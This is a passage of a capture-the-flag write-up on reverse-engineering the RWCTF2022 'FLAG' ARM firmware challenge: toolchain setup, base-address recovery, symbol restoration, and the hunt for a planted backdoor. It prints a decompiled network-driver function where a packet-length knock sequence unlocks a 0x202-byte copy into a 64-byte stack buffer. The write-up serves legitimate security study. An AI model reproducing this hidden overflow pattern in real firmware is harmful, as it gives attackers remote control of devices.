    <published>2022-01-30T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.083Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><p>These are notes written while reviewing the FLAG challenge from RWCTF2022.</p><p>The challenge is fairly complex, so it gets a post of its own.</p><blockquote><p>Co-author: sakura</p></blockquote><!-- more ---><h2 id="一、FLAG-小叙">1. About the FLAG challenge</h2><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">FreeRTOS+LwIP+ARM+GoAhead</span><br><span class="line">I don&#x27;t want another backdoor ctf. So I have to say: &quot;There is a backdoor in challange&quot;</span><br><span class="line">The default account in attachment is admin:admin</span><br><span class="line">nc 8.210.44.156 31337</span><br><span class="line">attachment</span><br><span class="line"></span><br><span class="line">Pwn, difficulty:normal</span><br><span class="line">Hint: flag.bin has a backdoor/bugdoor and you&#x27;re supposed to take over it. 
The flag is not embedded in the binary and will be made available to the appliance via network at runtime, see docker-compose.yml in attachment for details.</span><br></pre></td></tr></table></figure><p>The challenge is a single binary built from several components:</p><ul><li><a href="https://www.freertos.org/">FreeRTOS</a>: a lightweight real-time operating system.<ul><li>There is no user/kernel separation: every task runs in privileged mode and can execute privileged instructions.</li><li>The application logic is compiled together with the kernel code into a single binary, so there is no NX, PIE, ASLR, etc.</li><li>There is no memory protection, so after our shellcode runs we must make sure the OS does not crash.</li></ul></li><li><a href="http://savannah.nongnu.org/projects/lwip/">LwIP</a>: a lightweight TCP/IP implementation for resource-constrained embedded systems</li><li>ARM: 32-bit little-endian ARM architecture</li><li><a href="https://github.com/embedthis/goahead">GoAhead</a>: a tiny embedded web server</li></ul><p>The challenge ships several attachments; the useful ones are:</p><ul><li><p><code>flag.py</code>: the docker service sends a <strong>GET</strong> request to <code>http://localhost:5555/action/backdoor</code> <strong>every 30 s</strong>. If:</p><ul><li>the response body is <code>&#123;'status' : 'success'&#125;</code></li><li>the HTTP status code is <strong>200</strong></li></ul><p>then <code>flag.py</code> loads the flag and sends it to that backdoor as <code>&#123;&quot;flag&quot;: flag&#125;</code>.</p><p>Clearly, we need to pwn this binary, <strong>fake a backdoor service, receive the flag sent to it, and print it back to the user</strong>.</p></li><li><p><code>flag.bin</code>: the challenge binary; more on it later.</p></li><li><p><code>dockerfile</code>: records the qemu launch arguments:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-arm \</span><br><span class="line">  -m 64 \</span><br><span class="line">  -nographic \</span><br><span class="line">  -machine vexpress-a9 \</span><br><span class="line">  -net user,hostfwd=tcp::5555-:80 \</span><br><span class="line">  -net nic \</span><br><span class="line">  -kernel /mnt/flag.bin</span><br></pre></td></tr></table></figure></li></ul><p>After starting the challenge, open 
<code>localhost:5555</code> to reach the login page of the challenge's web service:</p><p><img src="/2022/01/rwctf2022_flag/image-20220128144627376.png" alt="image-20220128144627376"></p><p>Logging in with username <code>admin</code> and password <code>admin</code> leads to an ordinary mini-game page. Nothing about it stands out, so it is probably not the point. Requesting the backdoor endpoint directly returns a <code>404</code> page.</p><p>To quit QEMU, go to the terminal that launched qemu, press <code>ctrl + a</code>, <strong>release both keys</strong>, then press <code>x</code>.</p><h2 id="二、FLAG-环境搭建">2. Setting up the FLAG environment</h2><ul><li><p>Download and install the BinDiff plugin for IDA - <a href="https://www.zynamics.com/software.html">download link (a proxy may be needed)</a></p><p>Online tutorials say the installer asks for the IDA installation path. In my own test it never asked, yet IDA still detected and loaded the BinDiff plugin.</p><p>BinDiff will be used to recover the GoAhead symbols.</p></li><li><p>Install the multi-architecture gdb:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install gdb-multiarch</span><br></pre></td></tr></table></figure><p>To debug the kernel:</p><ul><li>Append <code>-gdb tcp::1234</code> to the qemu launch arguments</li><li>Then, in <code>gdb-multiarch</code>, run <code>target remote localhost:1234</code> to attach to qemu</li></ul></li></ul><h2 id="三、确定内核加载基地址">3. Determining the kernel load base address</h2><p>If the challenge kernel is dropped into IDA as-is, IDA cannot make sense of it, so the load base address has to be determined and specified by hand.</p><blockquote><p>Determining a base address is inherently hard; it takes logical deduction plus bold guessing.</p></blockquote><p>First, open flag.bin in <strong>32-bit</strong> IDA (note: 32-bit) and set Processor Type to ARM Little-endian:</p><p><img src="/2022/01/rwctf2022_flag/image-20220128162324429.png" alt="image-20220128162324429"></p><p>Then run make code on the first few instructions (hotkey p or c), which yields a series of memory-address load instructions:</p><p><img src="/2022/01/rwctf2022_flag/image-20220128164704594.png" alt="image-20220128164704594"></p><p>Note that these instructions access addresses of the form <code>0x6001XXXX</code>, and that gdb breaks at the instruction address <code>0x60010658</code>:</p><p><img src="/2022/01/rwctf2022_flag/image-20220128164823570.png" alt="image-20220128164823570"></p><p>From this we can reasonably infer that <strong>the base address is 0x60010000</strong>.</p><p>With the load base address settled, rebase the program in IDA.</p><p><img src="/2022/01/rwctf2022_flag/image-20220128151550841.png" 
alt="image-20220128151550841"></p><p>IDA can now analyze <strong>part</strong> of the code:</p><p><img src="/2022/01/rwctf2022_flag/image-20220128165114508.png" alt="image-20220128165114508"></p><p>Next, select all code and data in IDA, right-click and choose Analyze to run a full analysis, then wait for it to finish.</p><p><img src="/2022/01/rwctf2022_flag/image-20220128175327783.png" alt="image-20220128175327783"></p><p>This analysis is still incomplete, so a second pass with the <a href="https://github.com/zh-explorer/ida_script/blob/master/firmware_fix.py">firmware-fix</a> script is needed to create function bodies, strings, and so on automatically. (The end of the code region was determined to be <code>0x6006F544</code>.)</p><blockquote><p>Note: the script cannot tell different segments apart, so its results on this challenge are mediocre… It turns some things that are obviously data into functions.</p><p>The source is short and worth a look if you are interested.</p></blockquote><p>After these steps a fair number of strings still have no cross-references. We leave it at that for now.</p><p>Note that <strong>IDA's decompiler, Hex-Rays, relies on segment information (for example RWX permissions) to generate C code</strong>, so it is best to restore it. The simplest way is to set the current ROM segment's permissions to RWX; I instead created a text segment based on the recovered layout.</p><p><img src="/2022/01/rwctf2022_flag/image-20220128174408119.png" alt="image-20220128174408119"></p><h2 id="四、恢复符号">4. Recovering symbols</h2><h3 id="a-GoAhead-符号">a. GoAhead symbols</h3><p>Now we can try to recover the GoAhead symbols. First, use string search plus cross-references to locate GoAhead-related functions:</p><blockquote><p>Note: if F5 does not work on the function's disassembly, go to the <strong>end address</strong> of the <strong>previous function</strong>, right-click and choose Create Function, then decompile again.</p></blockquote><p><img src="/2022/01/rwctf2022_flag/image-20220128175919035.png" alt="image-20220128175919035"></p><p>A string on the last line of this function gives the GoAhead version, <code>5.1.5</code>, so we can build a GoAhead 5.1.5 binary right away:</p><blockquote><p>An arm32 compiler can be used here to build libgo.so, which gives better BinDiff results.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/embedthis/goahead</span><br><span class="line"><span class="built_in">cd</span> goahead</span><br><span class="line">git checkout v5.1.5</span><br><span 
class="line">make</span><br><span class="line">file build/linux-x64-default/bin/libgo.so <span class="comment"># the build output</span></span><br></pre></td></tr></table></figure><p>Load this libgo.so into IDA to produce the libgo.idb database. Then, in the IDA instance that has flag.bin open, use the BinDiff plugin to diff against libgo.idb.</p><p>A quick comparison shows that functions with Similarity above 0.80 mostly line up with the decompiled libgo.so, so we can try importing the symbols for those functions:</p><blockquote><p>Note: BinDiff matches functions mainly on structural features such as basic-block and call-graph relationships, so it can still compare the two files and produce results even when they target <strong>different architectures</strong>.</p></blockquote><blockquote><p>The screenshot below shows me importing everything with similarity &gt; 0.40. It is better not to be this reckless and import functions with very low similarity.</p></blockquote><p><img src="/2022/01/rwctf2022_flag/image-20220128181721392.png" alt="image-20220128181721392"></p><p>Next, recover the GoAhead struct definitions. In the libgo.so IDA window, click <code>File -&gt; Produce file -&gt; Create C Header File</code> to export the struct definitions to a new header file; then, in the flag.bin IDA window, click <code>File -&gt; Load file -&gt; Parse C header file</code> to import that header.</p><h3 id="b-lwIP-符号">b. 
lwIP symbols</h3><p>The challenge prints the version number at boot:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lwIP-2.1.3 initialized!</span><br></pre></td></tr></table></figure><p>First, fetch the source and build it:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://git.savannah.nongnu.org/git/lwip.git</span><br><span class="line"><span class="built_in">cd</span> lwip</span><br><span class="line">git checkout STABLE-2_1_3_RELEASE</span><br><span class="line">cmake -B build .</span><br><span class="line"><span class="built_in">cd</span> build</span><br><span class="line"><span class="comment"># install the ARM compiler</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get install gcc-arm-linux-gnueabihf</span><br><span class="line">CC=arm-linux-gnueabihf-gcc make lwipcore lwipallapps</span><br></pre></td></tr></table></figure><p>make fails with various missing-header errors, so first pull down a copy of the FreeRTOS source:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># in the directory that contains the lwip checkout</span></span><br><span class="line">git <span class="built_in">clone</span> https://github.com/FreeRTOS/FreeRTOS</span><br><span class="line">git -C FreeRTOS submodule update --init --recursive</span><br></pre></td></tr></table></figure><p>Then apply this patch to lwIP:</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">diff --git a/CMakeLists.txt b/CMakeLists.txt</span></span><br><span class="line"><span class="comment">index f05c0f61..a26752f1 100644</span></span><br><span class="line"><span class="comment">--- 
a/CMakeLists.txt</span></span><br><span class="line"><span class="comment">+++ b/CMakeLists.txt</span></span><br><span class="line"><span class="meta">@@ -14,6 +14,9 @@</span> set(CPACK_PACKAGE_VERSION_PATCH &quot;$&#123;LWIP_VERSION_REVISION&#125;&quot;)</span><br><span class="line"> set(CPACK_SOURCE_IGNORE_FILES &quot;/build/;$&#123;CPACK_SOURCE_IGNORE_FILES&#125;;.git&quot;)</span><br><span class="line"> set(CPACK_SOURCE_PACKAGE_FILE_NAME &quot;lwip-$&#123;LWIP_VERSION_MAJOR&#125;.$&#123;LWIP_VERSION_MINOR&#125;.$&#123;LWIP_VERSION_REVISION&#125;&quot;)</span><br><span class="line"> include(CPack)</span><br><span class="line"><span class="addition">+include_directories (&quot;src/include&quot;)</span></span><br><span class="line"><span class="addition">+include_directories (&quot;test/unit&quot;)</span></span><br><span class="line"><span class="addition">+include_directories (&quot;../FreeRTOS/FreeRTOS/Demo/CORTEX_A9_Zynq_ZC702/RTOSDemo/src/lwIP_Demo/lwIP_port/include&quot;)</span></span><br><span class="line"> </span><br><span class="line"> # Target for package generation</span><br><span class="line"> add_custom_target(dist COMMAND $&#123;CMAKE_MAKE_PROGRAM&#125; package_source)</span><br><span class="line"><span class="comment">diff --git a/src/include/lwip/arch.h b/src/include/lwip/arch.h</span></span><br><span class="line"><span class="comment">index 58dae33a..6159082f 100644</span></span><br><span class="line"><span class="comment">--- a/src/include/lwip/arch.h</span></span><br><span class="line"><span class="comment">+++ b/src/include/lwip/arch.h</span></span><br><span class="line"><span class="meta">@@ -126,8 +126,8 @@</span> typedef uint8_t   u8_t;</span><br><span class="line"> typedef int8_t    s8_t;</span><br><span class="line"> typedef uint16_t  u16_t;</span><br><span class="line"> typedef int16_t   s16_t;</span><br><span class="line"><span class="deletion">-typedef uint32_t  u32_t;</span></span><br><span class="line"><span class="deletion">-typedef 
int32_t   s32_t;</span></span><br><span class="line"><span class="addition">+// typedef uint32_t  u32_t;</span></span><br><span class="line"><span class="addition">+// typedef int32_t   s32_t;</span></span><br><span class="line"> #if LWIP_HAVE_INT64</span><br><span class="line"> typedef uint64_t  u64_t;</span><br><span class="line"> typedef int64_t   s64_t;</span><br><span class="line"><span class="comment">diff --git a/src/include/lwip/sockets.h b/src/include/lwip/sockets.h</span></span><br><span class="line"><span class="comment">index d70d36c4..ac17f302 100644</span></span><br><span class="line"><span class="comment">--- a/src/include/lwip/sockets.h</span></span><br><span class="line"><span class="comment">+++ b/src/include/lwip/sockets.h</span></span><br><span class="line"><span class="meta">@@ -108,7 +108,7 @@</span> struct sockaddr_storage &#123;</span><br><span class="line"> /* If your port already typedef&#x27;s socklen_t, define SOCKLEN_T_DEFINED</span><br><span class="line">    to prevent this code from redefining it. 
*/</span><br><span class="line"> #if !defined(socklen_t) &amp;&amp; !defined(SOCKLEN_T_DEFINED)</span><br><span class="line"><span class="deletion">-typedef u32_t socklen_t;</span></span><br><span class="line"><span class="addition">+// typedef u32_t socklen_t;</span></span><br><span class="line"> #endif</span><br><span class="line"> </span><br><span class="line"> #if !defined IOV_MAX</span><br><span class="line"><span class="meta">@@ -519,10 +519,10 @@</span> struct pollfd</span><br><span class="line"> #endif</span><br><span class="line"> </span><br><span class="line"> #if LWIP_TIMEVAL_PRIVATE</span><br><span class="line"><span class="deletion">-struct timeval &#123;</span></span><br><span class="line"><span class="deletion">-  long    tv_sec;         /* seconds */</span></span><br><span class="line"><span class="deletion">-  long    tv_usec;        /* and microseconds */</span></span><br><span class="line"><span class="deletion">-&#125;;</span></span><br><span class="line"><span class="addition">+// struct timeval &#123;</span></span><br><span class="line"><span class="addition">+//   long    tv_sec;         /* seconds */</span></span><br><span class="line"><span class="addition">+//   long    tv_usec;        /* and microseconds */</span></span><br><span class="line"><span class="addition">+// &#125;;</span></span><br><span class="line"> #endif /* LWIP_TIMEVAL_PRIVATE */</span><br><span class="line"> </span><br><span class="line"> #define lwip_socket_init() /* Compatibility define, no init needed. 
*/</span><br></pre></td></tr></table></figure><p>Then rerun the build steps above.</p><p>The result, however, turns out to be a <strong>static library</strong>, which cannot simply be dropped into IDA for analysis, so the CMake file list needs one more change:</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">diff --git a/src/Filelists.cmake b/src/Filelists.cmake</span></span><br><span class="line"><span class="comment">index 21d7b490..179f5716 100644</span></span><br><span class="line"><span class="comment">--- a/src/Filelists.cmake</span></span><br><span class="line"><span class="comment">+++ b/src/Filelists.cmake</span></span><br><span class="line"><span class="meta">@@ -268,12 +268,12 @@</span> else (DOXYGEN_FOUND)</span><br><span class="line"> endif (DOXYGEN_FOUND)</span><br><span class="line"> </span><br><span class="line"> # lwIP libraries</span><br><span class="line"><span class="deletion">-add_library(lwipcore EXCLUDE_FROM_ALL $&#123;lwipnoapps_SRCS&#125;)</span></span><br><span class="line"><span class="addition">+add_library(lwipcore SHARED $&#123;lwipnoapps_SRCS&#125;)</span></span><br><span class="line"> target_compile_options(lwipcore PRIVATE $&#123;LWIP_COMPILER_FLAGS&#125;)</span><br><span class="line"> target_compile_definitions(lwipcore PRIVATE $&#123;LWIP_DEFINITIONS&#125;  $&#123;LWIP_MBEDTLS_DEFINITIONS&#125;)</span><br><span class="line"> target_include_directories(lwipcore 
PRIVATE $&#123;LWIP_INCLUDE_DIRS&#125; $&#123;LWIP_MBEDTLS_INCLUDE_DIRS&#125;)</span><br><span class="line"> </span><br><span class="line"><span class="deletion">-add_library(lwipallapps EXCLUDE_FROM_ALL $&#123;lwipallapps_SRCS&#125;)</span></span><br><span class="line"><span class="addition">+add_library(lwipallapps SHARED $&#123;lwipallapps_SRCS&#125;)</span></span><br><span class="line"> target_compile_options(lwipallapps PRIVATE $&#123;LWIP_COMPILER_FLAGS&#125;)</span><br><span class="line"> target_compile_definitions(lwipallapps PRIVATE $&#123;LWIP_DEFINITIONS&#125;  $&#123;LWIP_MBEDTLS_DEFINITIONS&#125;)</span><br><span class="line"> target_include_directories(lwipallapps PRIVATE $&#123;LWIP_INCLUDE_DIRS&#125; $&#123;LWIP_MBEDTLS_INCLUDE_DIRS&#125;)</span><br></pre></td></tr></table></figure><p>The build then fails at link time with:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/usr/bin/ld: errno: TLS definition <span class="keyword">in</span> /lib/x86_64-linux-gnu/libc.so.6 section .tbss mismatches non-TLS reference <span class="keyword">in</span> CMakeFiles/lwipcore.dir/src/api/if_api.c.o</span><br></pre></td></tr></table></figure><p>Replacing the <code>extern int errno</code> declaration in lwIP's <code>errno.h</code> header fixes it:</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">diff --git a/src/include/lwip/errno.h b/src/include/lwip/errno.h</span></span><br><span class="line"><span class="comment">index 
48d6b539..acd7817f 100644</span></span><br><span class="line"><span class="comment">--- a/src/include/lwip/errno.h</span></span><br><span class="line"><span class="comment">+++ b/src/include/lwip/errno.h</span></span><br><span class="line"><span class="meta">@@ -174,7 +174,8 @@</span> extern &quot;C&quot; &#123;</span><br><span class="line"> #define  EMEDIUMTYPE    124  /* Wrong medium type */</span><br><span class="line"> </span><br><span class="line"> #ifndef errno</span><br><span class="line"><span class="deletion">-extern int errno;</span></span><br><span class="line"><span class="addition">+// extern int errno;</span></span><br><span class="line"><span class="addition">+#include &lt;errno.h&gt;</span></span><br><span class="line"> #endif</span><br><span class="line"> </span><br><span class="line"> #else /* LWIP_PROVIDE_ERRNO */</span><br></pre></td></tr></table></figure><p>The .so shared library now builds successfully. Its symbols can then be recovered by following the same steps as above.</p><blockquote><p>It later turned out that recovering the lwIP symbols was of no real use; consider this a record of the pitfalls.</p></blockquote><h2 id="五、漏洞思路">5. Finding the vulnerability</h2><p>Next, let's see what useful information the string table holds:</p><p><img src="/2022/01/rwctf2022_flag/image-20220128195501667.png" alt="image-20220128195501667"></p><p>They all look interesting, but none of them has cross-references (the recovery is still not good enough).</p><p>The referencing code can still be found, though, <strong>by searching the whole binary for the string's address</strong>.</p><p><img src="/2022/01/rwctf2022_flag/image-20220128202705045.png" alt="image-20220128202705045"></p><p>Following cross-references upward leads to this function, which registers a submit action whose handler is the function found in the previous step. Further cross-referencing shows that login and logout actions are registered as well, but those two do not look useful and are ignored for now.</p><p><img src="/2022/01/rwctf2022_flag/image-20220128211258805.png" alt="image-20220128211258805"></p><p>So how is submit invoked? A string search turns up the route path <code>/web/submit.jst</code>, so the page can be reached at the URL <code>http://localhost:5555/submit.jst</code>:</p><p><img src="/2022/01/rwctf2022_flag/image-20220128211958598.png" alt="image-20220128211958598"></p><p>The earlier reversing and a packet capture show that <strong>GoAhead uses sessions</strong>. So after submitting some data on this page, <strong>the previously submitted data is still displayed</strong> on the next visit.</p><p>That is all for the submit endpoint for now. According to players who solved the challenge, apart from the added submit 
feature, GoAhead is essentially unmodified. From further reading, the backdoor should be located in <strong>the smc911x driver of the lwIP module in RT-Thread (a Chinese-developed RTOS)</strong>…</p><blockquote><p>Which leaves me wondering how the other players managed to find this backdoor…</p></blockquote><p>Skipping ahead with hindsight: the backdoor is at address <code>0x6001B024</code> (<a href="https://github.com/RT-Thread/rt-thread/blob/master/bsp/qemu-vexpress-a9/drivers/drv_smc911x.c#L447">the smc911x_emac_rx function</a>, which receives packets). Below is the IDA decompilation after some light manual symbol recovery:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span 
class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> __fastcall <span class="title">smc911x_emac_rx_backdoor</span><span class="params">(<span class="type">int</span> a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">int</span> *v1; <span class="comment">// r4</span></span><br><span class="line">  <span class="type">char</span> v4[<span class="number">64</span>]; <span class="comment">// [sp+Ch] [bp-70h] BYREF</span></span><br><span class="line">  <span class="type">int</span> v5[<span class="number">2</span>]; <span class="comment">// [sp+4Ch] [bp-30h] BYREF</span></span><br><span class="line">  <span class="type">int</span> *v6; <span class="comment">// [sp+54h] [bp-28h]</span></span><br><span class="line">  <span class="type">int</span> pktlen; <span class="comment">// [sp+58h] [bp-24h]</span></span><br><span class="line">  <span class="type">int</span> status; <span class="comment">// [sp+5Ch] [bp-20h]</span></span><br><span class="line">  <span class="type">int</span> v9; <span class="comment">// [sp+60h] [bp-1Ch]</span></span><br><span class="line">  <span class="type">int</span> *data; <span class="comment">// [sp+64h] [bp-18h]</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> v11; <span class="comment">// [sp+68h] [bp-14h]</span></span><br><span class="line">  <span class="type">int</span> v12; <span class="comment">// [sp+6Ch] [bp-10h]</span></span><br><span class="line"></span><br><span class="line">  v12 = <span class="number">0</span>;</span><br><span class="line">  v9 = a1;</span><br><span class="line">  <span class="keyword">if</span> ( !a1 )</span><br><span class="line">    <span class="built_in">rt_assert_handler</span>(byte_600704AC, <span 
class="number">0</span>);</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="type">unsigned</span> __int8)((<span class="type">unsigned</span> <span class="type">int</span>)<span class="built_in">smc911x_reg_read</span>(v9, <span class="number">124</span>) &gt;&gt; <span class="number">16</span>) )</span><br><span class="line">  &#123;</span><br><span class="line">    status = <span class="built_in">smc911x_reg_read</span>(v9, <span class="number">64</span>);</span><br><span class="line">    pktlen = <span class="built_in">HIWORD</span>(status) &amp; <span class="number">0x3FFF</span>;</span><br><span class="line">    <span class="built_in">smc911x_reg_write</span>(v9, <span class="number">0x6C</span>, <span class="number">0</span>);</span><br><span class="line">    v11 = (<span class="type">unsigned</span> <span class="type">int</span>)(pktlen + <span class="number">3</span>) &gt;&gt; <span class="number">2</span>;</span><br><span class="line">    v12 = <span class="built_in">pbuf_alloc</span>(<span class="number">0</span>, <span class="number">4</span> * v11, <span class="number">0x280u</span>);</span><br><span class="line">    <span class="keyword">if</span> ( v12 )</span><br><span class="line">    &#123;</span><br><span class="line">      data = *(<span class="type">int</span> **)(v12 + <span class="number">4</span>);</span><br><span class="line">      <span class="keyword">while</span> ( v11-- )</span><br><span class="line">      &#123;</span><br><span class="line">        v1 = data++;</span><br><span class="line">        *v1 = <span class="built_in">smc911x_reg_read</span>(v9, <span class="number">0</span>);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( (status &amp; <span class="number">0x8000</span>) != <span class="number">0</span> )</span><br><span class="line">      <span class="built_in">rt_kprintf</span>(<span 
class="string">&quot;EMAC: dropped bad packet. Status: 0x%08x\n&quot;</span>, status);</span><br><span class="line">    v5[<span class="number">0</span>] = dword_<span class="number">60079E78</span> + <span class="number">0x16D6DD4</span>;         <span class="comment">// backdoor</span></span><br><span class="line">    v5[<span class="number">1</span>] = dword_<span class="number">60079E7</span>C + <span class="number">0xC25FBB</span>;</span><br><span class="line">    v6 = v5;</span><br><span class="line">    <span class="keyword">if</span> ( pktlen == (<span class="type">unsigned</span> __int8)(dword_<span class="number">60079E78</span> - <span class="number">0x2C</span>) )<span class="comment">// 0x62</span></span><br><span class="line">    &#123;</span><br><span class="line">      backdoor_time = <span class="built_in">time</span>(<span class="number">0</span>);</span><br><span class="line">      backdoor_cnt = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> ( pktlen == *((<span class="type">unsigned</span> __int8 *)v6 + backdoor_cnt) &amp;&amp; <span class="built_in">time</span>(<span class="number">0</span>) - backdoor_time &lt;= <span class="number">4</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      ++backdoor_cnt;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( backdoor_cnt == <span class="number">8</span> &amp;&amp; pktlen == <span class="number">0x202</span> &amp;&amp; v12 )</span><br><span class="line">      <span class="built_in">diy_memcpy</span>((<span class="type">int</span>)v4, *(_DWORD *)(v12 + <span class="number">4</span>), pktlen);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v12;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>And here is the upstream source of that function (note that the version differs, which introduces some discrepancies):</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* reception packet. 
